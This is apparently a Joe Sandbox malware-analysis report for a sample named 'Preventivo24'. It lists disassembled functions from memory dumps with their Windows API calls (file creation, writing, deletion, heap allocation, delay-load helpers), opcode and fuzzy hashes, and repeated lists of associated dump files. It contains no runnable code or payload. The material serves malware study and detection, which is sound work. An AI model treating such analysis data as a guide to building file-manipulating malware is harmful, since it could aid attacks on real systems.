Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: ee4897b94a262d6ecd95c46a864811d8cd32af3b0ee5c8e0532985a554d11458
Instruction ID: 173cf622988ca9e0bdfbc0fb2f9e3448dae1620052ba38c4eaa66bdef61993de
Opcode Fuzzy Hash: ee4897b94a262d6ecd95c46a864811d8cd32af3b0ee5c8e0532985a554d11458
Instruction Fuzzy Hash: 8B516A34A01A498FDB05CF68C948659FBE5FF49320F1482A9E925D73A1DB349E05CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00FEB310 Relevance: 1.6, APIs: 1, Instructions: 112COMMON

Download Yara Rule

APIs

EnumResourceLanguagesW.KERNEL32(?,00000010,00000001,00FEB450,?), ref: 00FEB35B

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: EnumLanguagesResource
String ID:
API String ID: 4141015960-0
Opcode ID: e7eadb3f91bcb01e2cfb00d0a34c73e49638ade207868ea80af5574db8bec96c
Instruction ID: a066621e84acac94eedda95eee4642040503aaad40bde80e57b7a04592c73230
Opcode Fuzzy Hash: e7eadb3f91bcb01e2cfb00d0a34c73e49638ade207868ea80af5574db8bec96c
Instruction Fuzzy Hash: 7D41AE7180424A9BDB10DF95C981BDFBBF8FF04314F10416AE514BB282DB75A945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0100A2E0 Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,B5580983,?,?,?,?,?,?,010E5C7D), ref: 0100A344

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1ae9fce5af4c002b01b8af17f8a9a59aa72d6829cad55b775d17ce3b7338de07
Instruction ID: 3d6f7d8e8ba3321843973efa01539e69667478a494ffd6bf5eee6867d997c3d7
Opcode Fuzzy Hash: 1ae9fce5af4c002b01b8af17f8a9a59aa72d6829cad55b775d17ce3b7338de07
Instruction Fuzzy Hash: 0D216F71A00309EFDB24DF69C945B9EBBF8FB48714F10466AE925A73C0DB746905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 010044B0 Relevance: 1.5, APIs: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(00000000,?,00000000,B5580983,00000000,B5580983), ref: 01004546

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: faa26174554aefce7436e010a3fef4661c38d54805b80870c84cc5914b249b3a
Instruction ID: d6222adb43a22b3c73db82134fe3a2e254628e72641bbc3a7078a53c5e02de23
Opcode Fuzzy Hash: faa26174554aefce7436e010a3fef4661c38d54805b80870c84cc5914b249b3a
Instruction Fuzzy Hash: 16F04431A04555AFDB21CF19DC45F9BB7BCEB45764F004225F921E73D4D7B4A9008694

Uniqueness

Uniqueness Score: -1.00%

Function 00E8B070 Relevance: 1.5, APIs: 1, Instructions: 34memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0108C321: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,00000000,80004005,B5580983,?), ref: 0108C381

RtlAllocateHeap.NTDLL(?,00000000,?,B5580983,00000000,010B1B00,000000FF,?,?,011C5D3C,?,?,01003AC7,80004005,B5580983,?), ref: 00E8B0BA

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AllocateExceptionHeapRaise
String ID:
API String ID: 3789339297-0
Opcode ID: cf174fa703301b24378897988d62f757e0d83041182e440c3d69fce49fc3baa4
Instruction ID: a5720f22e92a137ccdbedbd1aacee807a0523c767fedabdb8cbb6e33319d24c7
Opcode Fuzzy Hash: cf174fa703301b24378897988d62f757e0d83041182e440c3d69fce49fc3baa4
Instruction Fuzzy Hash: B0F0E271648208FFCB15DF40DD06F9ABBB8EB04B10F00862DF828826A0E735A9008B54

Uniqueness

Uniqueness Score: -1.00%

Function 010A28A0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,010A060A,?,010A4853,?,00000000,?,0109464A,00000000,010A060A,?,?,?,?,010A0404), ref: 010A28D2

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 6db9e9081621eb71e8e607a759ec3c461105fd1fb89a5d4546ef46c8e367eb42
Instruction ID: 0835ef26280ed1bcc8d2b58eb5fe4cae86b215e858d4f9d4f835318af5c172bc
Opcode Fuzzy Hash: 6db9e9081621eb71e8e607a759ec3c461105fd1fb89a5d4546ef46c8e367eb42
Instruction Fuzzy Hash: F4E0653114722696F77126E95D04B9E7A8A9F426B0F8501B0FDD9A65C0DB54C88083F1

Uniqueness

Uniqueness Score: -1.00%

Function 010A0572 Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 010A0579

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 4cf86d4ababd9dd035b5c3fc0479722b62d57a2e0519ed018bef3ca9144504fa
Instruction ID: 5dea4c0051fc6e5490474d5f1cf259ad22e7b6a6699d023fffd4c617ca41e2a6
Opcode Fuzzy Hash: 4cf86d4ababd9dd035b5c3fc0479722b62d57a2e0519ed018bef3ca9144504fa
Instruction Fuzzy Hash: 85E09A72C0020E9ADB01EFD4C551BEFB7B8FF18300F508026A645E7140EB7457458BE1

Uniqueness

Uniqueness Score: -1.00%

Function 0108A38B Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0108A39D

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 3f0db2ba9a48817f5fa34bf6b872e2bcee7967fbeeb442cdf8d1e4d51f7ea5af
Instruction ID: 6a432e34beea5a6ed4501a0bc4ed44cc6af7e33021f0028f96a989f0d90fa91e
Opcode Fuzzy Hash: 3f0db2ba9a48817f5fa34bf6b872e2bcee7967fbeeb442cdf8d1e4d51f7ea5af
Instruction Fuzzy Hash: B2B0929326C111AE200861115A06C3A210CD0A0910324800EF0C0A4000A5C10C494432

Uniqueness

Uniqueness Score: -1.00%

Function 0108A3CE Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0108A39D

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 71e473e404028207abab7870e7f0183aaced0c63ce5a57ea061a4d915f075a47
Instruction ID: 6c40428d11b79c1dff61e20c03232bb874584a75b80d4b5e40779e540f1b7cc7
Opcode Fuzzy Hash: 71e473e404028207abab7870e7f0183aaced0c63ce5a57ea061a4d915f075a47
Instruction Fuzzy Hash: 30B0129336C011BE300CB1155E02D3B310CD0F1D10330C00FF4C0D5500D5C00C484432

Uniqueness

Uniqueness Score: -1.00%

Function 010B0968 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 010B0937

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: fa99ce3f3eb8469ec9344422731e65e8dcad8914d8e211672cc033ed1e413fe6
Instruction ID: 11481632bbde24bec568286c09e7475f4143b7a17dc490a82b0d64316af13137
Opcode Fuzzy Hash: fa99ce3f3eb8469ec9344422731e65e8dcad8914d8e211672cc033ed1e413fe6
Instruction Fuzzy Hash: A6B012D22AD001BD300CA2052E02E7B112CD4E4D74330801EF0C0C4108D7800C004431

Uniqueness

Uniqueness Score: -1.00%

Function 01086F72 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 01086EF1

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 0a4af8cc48680a64d549fd04a1fcd8ecd8c9fc2f756c2cac90efaf88ae61cf0a
Instruction ID: 41327dabc689f7d37433e31fdb5b65ef9c3f11222acdb196892825facae8eeec
Opcode Fuzzy Hash: 0a4af8cc48680a64d549fd04a1fcd8ecd8c9fc2f756c2cac90efaf88ae61cf0a
Instruction Fuzzy Hash: A6B0129235C101AD300CF1896E02D3B314CD0D0F10330802EF4D0D0140D5824C008171

Uniqueness

Uniqueness Score: -1.00%

Function 01086EDF Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 01086EF1

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: a556ef356e0f2db2d732ec678d6f6b3f7cc13c62d71b329127319b45d4a4e47f
Instruction ID: 97a25a0b4ac0928f07ab8eda6dd294a8834a4dc9bb3928040af382d97558edaa
Opcode Fuzzy Hash: a556ef356e0f2db2d732ec678d6f6b3f7cc13c62d71b329127319b45d4a4e47f
Instruction Fuzzy Hash: 3CB012D635C201BF300CB1839E02C3B310CC0D0E10330812EF0D0E0040D9828C414072

Uniqueness

Uniqueness Score: -1.00%

Function 01086EFA Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 01086EF1

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
API String ID: 697777088-0
Opcode ID: 014aca0b1c2fbb62eedddb0a3468ee5727e751f13c0246c7b220a1913d87de83
Instruction ID: 3f03b0773e03830fb1fe8fc07e9637364a9d6d80adc8d5c85ab33b20a192f61f
Opcode Fuzzy Hash: 014aca0b1c2fbb62eedddb0a3468ee5727e751f13c0246c7b220a1913d87de83
Instruction Fuzzy Hash: 1AB0129235C001BD300CF1865E02D3A314CD1D0E10330802EF0D4D0140D9828C014032

Uniqueness

Uniqueness Score: -1.00%

Function 0108754A Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 0108752D

Part of subcall function 010879ED: DloadAcquireSectionWriteAccess.DELAYIMP ref: 010879F8
Part of subcall function 010879ED: DloadReleaseSectionWriteAccess.DELAYIMP ref: 01087A60
Part of subcall function 010879ED: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 01087A71

Memory Dump Source

Source File: 00000000.00000002.1701195138.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.1701103606.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701739728.0000000001117000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701875491.00000000011CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701904913.00000000011CD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701939148.00000000011CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.00000000011F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.0000000001200000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1702005836.000000000120B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_Preventivo24.jbxd

Similarity

API ID: AccessDloadSectionWrite$AcquireExceptionHelper2@8LoadRaiseRelease___delay
String ID:
